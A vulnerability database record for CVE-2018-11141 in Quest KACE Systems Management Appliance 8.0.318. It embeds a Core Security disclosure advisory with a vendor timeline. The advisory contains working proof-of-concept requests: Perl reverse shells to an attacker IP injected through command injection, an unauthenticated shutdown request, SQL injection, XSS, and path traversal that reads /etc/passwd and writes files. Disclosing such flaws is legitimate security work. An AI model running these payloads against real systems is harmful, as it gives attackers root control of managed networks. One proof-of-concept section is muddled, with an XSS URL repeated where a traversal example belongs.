},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0601",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "kace system management appliance",
"scope": "eq",
"trust": 2.2,
"vendor": "quest",
"version": "8.0.318"
},
{
"model": "kace systems management appliance",
"scope": "eq",
"trust": 0.8,
"vendor": "quest",
"version": "8.0.318"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15643"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005459"
},
{
"db": "NVD",
"id": "CVE-2018-11141"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1213"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:quest:kace_system_management_appliance:8.0.318:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11141"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Core Security Technologies, Leandro Barragan, Guido Leo",
"sources": [
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 0.1
},
"cve": "CVE-2018-11141",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-11141",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-15643",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-11141",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-11141",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2018-15643",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201805-1213",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2018-11141",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15643"
},
{
"db": "VULMON",
"id": "CVE-2018-11141"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005459"
},
{
"db": "NVD",
"id": "CVE-2018-11141"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1213"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The \u0027IMAGES_JSON\u0027 and \u0027attachments_to_remove[]\u0027 parameters of the \u0027/adminui/advisory.php\u0027 script in the Quest KACE System Management Virtual Appliance 8.0.318 can be abused to write and delete files respectively via Directory Traversal. Files can be at any location where the \u0027www\u0027 user has write permissions. QuestKACESystemManagementVirtualAppliance is an IT asset management device from QuestSoftware, USA. A path traversal vulnerability exists in QuestKACESystemManagementVirtualAppliance version 8.0.318. An attacker could use the \\342\\200\\230IMAGES_JSON\\342\\200\\231 and \\342\\200\\230attachments_to_remove[]\\342\\200\\231 parameters to write and delete files with this vulnerability. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nQuest KACE System Management Appliance Multiple Vulnerabilities\n\n1. *Advisory Information*\n\nTitle: Quest KACE System Management Appliance Multiple Vulnerabilities\nAdvisory ID: CORE-2018-0004\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities\nDate published: 2018-05-31\nDate of last update: 2018-05-22\nVendors contacted: Quest Software Inc. \nRelease mode: Forced release\n\n2. *Vulnerability Information*\n\nClass: Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege\nManagement [CWE-269], Improper Privilege Management [CWE-269], Improper\nAuthorization [CWE-285], Improper Neutralization of Special Elements used\nin an SQL Command [CWE-89], Improper Neutralization of Special Elements\nused in an SQL Command [CWE-89], Improper Neutralization of Input During\nWeb Page Generation [CWE-79], External Control of File Name or Path\n[CWE-73], External Control of File Name or Path [CWE-73]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: Yes\nCVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134,\nCVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140,\nCVE-2018-11133,\nCVE-2018-11137, CVE-2018-11141\n\n3. *Vulnerability Description*\n\n\u003eFrom Quest KACE\u0027s website:\n\n\"The KACE Systems Management Appliance [1] provides\nyour growing organization with comprehensive management of network-connected\ndevices, including servers, PCs, Macs, Chromebooks, tablets, printers,\nstorage, networking gear and the Internet of Things (IoT). KACE can fulfill\nall of your organization\u0027s systems management needs, from initial deployment\nto ongoing management and retirement.\"\n\nMultiple vulnerabilities were found in the Quest KACE System Management\nVirtual Appliance that would allow a remote attacker to gain command\nexecution as root. We present three vectors to achieve this, including\none that can be exploited as an unauthenticated user. \n\nAdditional web application vulnerabilities were found in the web console\nthat is bundled with the product. These vulnerabilities are detailed in\nsection 7. \n\nNote: This advisory has limited details on the vulnerabilities because\nduring the attempted coordinated disclosure process, Quest advised us not\nto distribute our original findings to the public or else they would\ntake legal action. Quest\u0027s definition of \"responsible disclosure\" can be\nfound at\nhttps://support.quest.com/essentials/reporting-security-vulnerability. \n\nCoreLabs has been publishing security advisories since 1997 and believes\nin coordinated disclosure and good faith collaboration with software vendors\nbefore disclosure to help ensure that a fix or workaround solution is ready\nand available when the vulnerability details are publicized. We believe\nthat providing technical details about each finding is necessary to provide\nusers and organizations with enough information to understand the\nimplications\nof the vulnerabilities against their environment and, most importantly, to\nprioritize the remediation activities aiming at mitigating risk. \n\nWe regret Quest\u0027s posture on disclosure during the whole process (detailed\nin the Report Timeline section) and the lack of a possibility of engaging\ninto a coordinated publication date, something we achieve (and have\nachieved) with many vendors as part of our coordinated disclosure practices. \n\n4. *Vulnerable Packages*\n\n. Quest KACE System Management Appliance 8.0 (Build 8.0.318)\nOther products and versions might be affected too, but they were not tested. \n\n5. *Vendor Information, Solutions and Workarounds*\n\nQuest reports that it has released the security vulnerability patch\nSEC2018_20180410 to address the reported vulnerabilities. \nPatch can be download at\nhttps://support.quest.com/download-install-detail/6086148. \n\nFor more details, Quest published the following Security Note:\nhttps://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-\n\n6. *Credits*\n\nThese vulnerabilities were discovered and researched by Leandro Barragan\nand Guido Leo from Core Security Consulting Services. The publication of\nthis advisory was coordinated by Leandro Cuozzo from Core Advisories Team. \n\n7. *Technical Description / Proof of Concept Code*\n\nQuest KACE SMA ships with a web console that provides administrators and\nusers with several features. Multiple vulnerabilities were found in the\ncontext of this console, both from an authenticated and unauthenticated\nperspective. \n\nSection 7.1 describes how an unauthenticated attacker could gain command\nexecution on the system as the web server user. \n\nVulnerabilities described in 7.2 and 7.3 could also be abused to gain code\nexecution but would require the attacker to have a valid authentication\ntoken. \n\nIn addition, issues found in the Sudo Server module presented in 7.4 and\n7.5 would allow the attacker to elevate his privileges from the web server\nuser to root, effectively obtaining full control of the device. \n\nAdditional web application vulnerabilities were found in the console, such\nas insufficient authorization for critical functions, which would allow an\nanonymous attacker to reconfigure the appliance (7.6), SQL injection\nvulnerabilities (7.7, 7,8), a cross-site scripting issue (7.9), and path\ntraversal vulnerabilities, which would allow an attacker to read, write and\ndelete arbitrary files (7.9, 7.10, 7.11). \n\n7.1. *Unauthenticated command injection*\n\n[CVE-2018-11138]\nThe \u0027/common/download_agent_installer.php\u0027 script is accessible to anonymous\nusers in order to download an agent for a specific platform. This behavior\ncan be abused to execute arbitrary commands on the system. \n\nThe script receives the following parameters via the GET method:\n\n. platform: Indicates the platform in which the agent is going to be\ninstalled\n. serv: SHA256 hash of a fixed value that depends of each appliance\n. orgid: Organization ID\n. version: Version number of the agent\n\nThe last two conditions are simple to meet. The Agent versions are publicly\navailable within the Quest KACE site, but even if they were not, we found\nthat the Organization ID parameter is vulnerable to a time based SQL\ninjection\n(refer to issue 7.7). \nThis would make it possible to obtain the agent version by querying the\ntable \u0027CLIENT_DISTRIBUTION\u0027 and fetching the contents of the \u0027VERSION\u0027\ncolumn. The Organization ID is 1 by default, but could be obtained in the\nsame way as the Agent version by querying the table \u0027ORGANIZATION\u0027 and\nthe column \u0027ID\u0027. \n\nAs stated above, the application uses the Organization ID and Agent\nversion parameters to execute commands. This means we need to find a way\nto append system commands within the Organization ID, without breaking the\nSQL query. If we use the comment symbol (#), we can append anything we want\nwithout affecting the result of the query. \n\nPreparing payload:\n\n/-----\n- platform = windows\n- serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\n- orgid = 1#;perl -e \u0027use\nSocket;$i=\"[AttackerIP]\";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e\u0026S\");open(STDOUT,\"\u003e\u0026S\");open(STDERR,\"\u003e\u0026S\");exec(\"/bin/bash\n-i\");};\u0027;\n- version = 8.0.152 (last agent version available for windows)\n-----/\n\nThe following proof of concept executes a reverse shell:\n\n/-----\nGET\n/common/download_agent_installer.php?platform=windows\u0026serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\u0026orgid=1%23%3bperl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027%3b\u0026version=8.0.152\nHTTP/1.1\nHost: Server\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.2. *Authenticated command injection*\n\n[CVE-2018-11139]\nThe \u0027/common/ajax_email_connection_test.php\u0027 script used to test the\nconfigured\nSMTP server is accessible by any authenticated user and can be abused to\nexecute arbitrary commands on the system. This script is vulnerable to\ncommand injection via the unsanitized user input \u0027TEST_SERVER\u0027 sent to the\nscript via POST method. \n\nThe following proof of concept executes a reverse shell:\n\n/-----\nPOST /common/ajax_email_connection_test.php HTTP/1.1\nHost: [ServerIP]\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 416\nCookie: [Cookie]\nConnection: close\n\nTEST_SERVER=test;perl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027;\u0026TEST_PORT=587\u0026TEST_USERNAME=eaea@eaea.com\u0026TEST_PASSWORD=1234\u0026TEST_OLD_PASSWORD=\u0026QUEUE_ID=1\u0026TEST_TO_EMAIL=eaea@eaea.com\u0026ACTION=TEST_CONNECTION_SMTP\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.3. *PHP Object Injection leading to arbitrary command execution*\n\n[CVE-2018-11135]\nAn authenticated user could abuse a deserialization call on the script\n\u0027/adminui/error_details.php\u0027 to inject arbitrary PHP objects. \n\nTo exploit this issue, the parameter \u0027ERROR_MESSAGES\u0027 needs to be an array\nand meet some specific conditions in order to successfully exploit the\nissue. \n\n7.4. *Privilege escalation via password change in Sudo Server*\n\n[CVE-2018-11134]\nIn order to perform actions that requires higher privileges, the application\nrelies on a message queue managed that runs with root privileges and only\nallows a set of commands. \n\nOne of the available commands allows to change any user\u0027s password\n(including root). \n\nAssuming we are able to run commands in the server, we could abuse this\nfeature by changing the password of the \u0027kace_support\u0027 account, which\ncomes disabled by default but has full sudo privileges. \n\n7.5. *Privilege escalation via command injection in Sudo Server*\n\n[CVE-2018-11132]\nAs mentioned in the issue [7.4], in order to perform actions that require\nhigher privileges, the application relies on a message queue that runs\ndaemonized with root privileges and only allows a set of commands to be\nexecuted. \n\nA command injection vulnerability exists within this message queue which\nallows us to append arbitrary commands that will be run as root. \n\n7.6. *Insufficient Authorization for critical function*\n\n[CVE-2018-11142]\n\u0027systemui/settings_network.php\u0027 and \u0027systemui/settings_patching.php\u0027\nscripts are accessible only from localhost. This restriction can be bypassed\nby modifying the \u0027Host\u0027 and \u0027X_Forwarded_For\u0027 HTTP headers. \n\nThe following proof of concept abuses this vulnerability to shutdown the\nserver as an anonymous user:\n\n/-----\nPOST /systemui/settings_network.php HTTP/1.1\nHost: localhost\nX-Forwarded-For: ::1\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIp]/systemui/settings_network.php\nContent-Type: multipart/form-data;\nboundary=---------------------------5642543667001619951434940129\nContent-Length: 3418\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"$shutdown\"\nDoIt!\nContent-Disposition: form-data; name=\"save\"\nSave\n-----------------------------5642543667001619951434940129--\n-----/\n\n7.7. *Unauthenticated SQL Injection in download_agent_installer.php*\n\n[CVE-2018-11136]\nThe \u0027orgID\u0027 parameter received by the \u0027/common/download_agent_installer.php\u0027\nscript is not sanitized, leading to SQL injection. In particular, a blind\ntime based type. \n\nThe following proof of concept induces a time delay:\n\n/-----\nhttp://[ServerIP]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1\nAND SLEEP(10)%23;\u0026version=8.0.152\n-----/\n\n7.8. *SQL Injection in run_report.php*\n\n[CVE-2018-11140]\nThe \u0027reportID\u0027 parameter received by the \u0027/common/run_report.php\u0027 script\nis not sanitized, leading to SQL injection. In particular, an error based\ntype. \n\nThe following proof of concept retrieves the current database name:\n\n/-----\nPOST /common/run_report.php HTTP/1.1\nContent-Length: 161\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nHost: [ServerIP]\nAccept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8\nConnection: close\nReferer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID=\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nCookie: [Cookie]\n\ndate=1516135247598\u0026reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx\u0026reportName=\u0026format=pdf\n-----/\n\n/-----\nHTTP/1.1 200 OK\nDate: Thu, 08 Feb 2018 21:50:21 GMT\nServer: Apache\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0,\npre-check=0\nPragma: no-cache\nVary: Accept-Encoding\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: [ServerIP]\nX-KACE-Version: 8.0.318\nX-KBOX-WebServer: [ServerIP]\nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: [ServerIP]\nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nContent-Length: 3548\nConnection: close\nContent-Type: text/html; charset=utf-8\n\n[...SNIPPED...]\n\u003cscript type=\"text/javascript\"\nsrc=\"/common/js/vendor/html5.js?BUILD=318\" /\u003e\u003c/script\u003e\n\u003c![endif]--\u003e\u003ctitle\u003eReport Queued: qppjqORG1qjpqq\u003c/title\u003e\u003cmeta\nhttp-equiv=\u0027refresh\u0027\n[...SNIPPED...]\n-----/\n\n7.9. *Unauthenticated Cross Site Scriting in run_cross_report.php*\n\n[CVE-2018-11133]\nThe \u0027fmt\u0027 parameter of the \u0027/common/run_cross_report.php\u0027 script is\nvulnerable to cross-site scripting. \n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\n7.10. The following proof\nof concept reads the \u0027/etc/passwd\u0027 file. No administrator privileges are\nneeded to execute this script. \n\nIt is worth noting that there are several interesting files that can be\nread with \u0027www\u0027 privileges, such as all the files located in\n\u0027/kbox/bin/koneas/keys/\u0027 and \u0027/kbox/kboxwww/include/globals.inc\u0027,\nwhich contain plaintext passwords. \n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nGET\n/common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd\u0026filename=\nHTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\nHTTP/1.1 200 OK\nDate: Thu, 18 Jan 2018 17:18:19 GMT\nServer: Apache\nCache-Control: must-revalidate, post-check=0, pre-check=0\nExpires: -1\nPragma: public\nContent-Disposition: attachment; filename=\"\"\nContent-Transfer-Encoding: Binary\nContent-Description: K1000 attachment\nContent-Length: 2400\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: k10000. \nX-KACE-Version: 8.0.318\nX-KBOX-WebServer: k10000. \nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: k10000. \nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nConnection: close\nContent-Type: application/octet-stream\n\n# $FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $\n#\nroot:*:0:0:Charlie \u0026:/root:/bin/csh\ndaemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin\noperator:*:2:5:System \u0026:/:/usr/sbin/nologin\nbin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin\ntty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...]\n-----/\n\n7.11. The following proof of concept creates a file located at\n\u0027/kbox/kboxwww/resources/TestWrite\u0027 with the content \u0027Sarasa\u0027 (base64\nencoded). \n\nFile deletion could be abused to delete\n\u0027/kbox/kboxwww/systemui/reports/setup_completed.log\u0027 file. This file\u0027s\nexistence defines if the appliance setup wizard is shown or not. \n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nPOST /adminui/advisory.php?ID=10 HTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIP]/adminui/advisory.php?ID=10\nContent-Type: multipart/form-data;\nboundary=---------------------------2671551246366368501556269100\nContent-Length: 1705\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n\n99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"IMAGES_JSON\"\n\n{\"/../../../resources/TestWrite\":\"aaaaaa,VGVzdENvbnRlbnQ=\"}\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"FARRAY[ID]\"\n[...SNIPPED...]\n-----/\n\nTaking advantage of 7.2 and 7.4 we are able to verify the file creation:\n\n/-----\n[root@k10000 /kbox/kboxwww/resources]# ls -lha\ntotal 32\ndrwxr-xr-x 2 www wheel 512B Feb 9 20:40 . \ndrwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. \n-rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite\n-----/\n\n8. *Report Timeline*\n2018-02-26: Core Security (Core) sent an initial notification to Quest\nSoftware Inc. (Quest) via web form. \n2018-03-05: Quest Support confirmed the receipt and requested additional\ninformation. \n2018-03-12: Core Security sent a draft advisory including a technical\ndescription. \n2018-03-16: Quest Support asked for the CVE-IDs. \n2018-03-16: Core Security answered saying that the CVE-IDs are required\nonce the vendor verifies the vulnerabilities. Additionally, Core Security\nrequested a confirmation about the reported vulnerabilities and a tentative\ntimescale to fix them. Finally, Core Security requested that Quest use\nCore\u0027s advisories-publication email address as the official communication\nhannel also copying the researchers behind this discovery. \n2018-03-16: Quest Support thanked Core\u0027s reply and stated it will be in\ntouch during the process. \n2018-03-20: Quest Support informed that they had not yet received any\nupdates from the engineering team and had requested one. \n2018-03-21: Quest Support requested information about the KACE version\nused for reporting the issues and also Core\u0027s company name and information. \n2018-03-21: Core replied with the affected version (that was included in\nthe original draft advisory) and a link to the Core company website and\nthe list of previous security advisories. \n2018-03-21: Quest Support acknowledged the information provided. \n2018-03-26: Quest\u0027s KACE product manager (PM) thanked Core for making it\naware of the security issues found and the level of thoroughness and details\nprovided. Quest specified it had fixes already in place for some of the\nissues. Quest\u0027s KACE PM asked for a conference call in order to understand\nmore about Core\u0027s offerings for future engagements. Finally, Quest\u0027s KACE\nPM notified the work done by Core is in breach of its license agreement,\nand requested Core not to distribute the findings to the public, otherwise\nuest would take legal action. \n2018-04-13: Quest\u0027s KACE PM sent a follow up email and informed that it\nmade a hotfix to patch the reported vulnerabilities. Quest also requested\na call meeting to understand future opportunities based on the Core\u0027s\ncompany capabilities. Finally, Quest asked for information about the\nresearcher that found the vulnerabilities and a link of Core\u0027s choosing\nin order to be included in Quest\u0027s Acknowledgment page\n(https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). \n2018-04-16: Core answered email from 2018-03-26 stating the company is\nfollowing standard practices with regards to coordinated vulnerability\ndisclosure, and also sent detailed technical information about our findings\nat Quest\u0027s request. Core also mentioned Quest seems to be well versed in\nthe disclosure process and expects vendors to coordinate with it prior to\npublication via Quest\u0027s vulnerability reporting process, and that Quest\u0027s\nlegal threat appears to be in direct contradiction to the disclosure\nprocess that they encourage on their website. Finally, Core asked about\nQuest\u0027s intention to work collaboratively to address these vulnerabilities\nand to follow industry standard disclosure processes that involves\npublication of the vulnerabilities. \n2018-04-17: Quest\u0027s KACE PM replied saying it is willing to collaborate\nand is looking forward to having a conversation over the phone in order to\ncontinue the next steps in its vulnerability process (forwarded email from\n2018-04-13). \n2018-04-17: Core thanked the answer and stated the willingness of keeping\nwritten communications between parties in order to better document the\nprocess and communicated the next steps of the process including: 1. Testing\nthe fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor\u0027s link to be\nincluded in the advisory and finally 4. Send final advisory version to\nvendor and coordinate publication date together. With regards to Quest\u0027s\nrequests, Core provided the researchers names and URL of the advisory when\nit will be published. Finally, Core stated that the request for other Core\ncompany services could be forwarded to the Core services team if needed\n(and asked the right contact at Quest) but our intention is to keep that\nservices request separate from the coordinated disclosure process. \n2018-04-18: Quest Support informed that they had publicly made available\npatches for its customers and unilaterally closed the case. \n2018-05-31: Advisory CORE-2018-0004 published. \n\n9. *References*\n\n[1] https://www.quest.com/products/kace-systems-management-appliance/\n\n10. *About CoreLabs*\n\nCoreLabs, the research center of Core Security, is charged with anticipating\nthe future needs and requirements for information security technologies. \nWe conduct our research in several important areas of computer security\nincluding system vulnerabilities, cyber-attack planning and simulation,\nsource code auditing, and cryptography. Our results include problem\nformalization, identification of vulnerabilities, novel solutions and\nprototypes for new technologies. CoreLabs regularly publishes security\nadvisories, technical papers, project information and shared software\ntools for public use at:\nhttp://corelabs.coresecurity.com. \n\n11. *About Core Security*\n\nCore Security provides companies with the security insight they need to\nknow who, how, and what is vulnerable in their organization. The company\u0027s\nthreat-aware, identity amp; access, network security, and vulnerability\nmanagement solutions provide actionable insight and context needed to\nmanage security risks across the enterprise. This shared insight gives\ncustomers a comprehensive view of their security posture to make better\nsecurity remediation 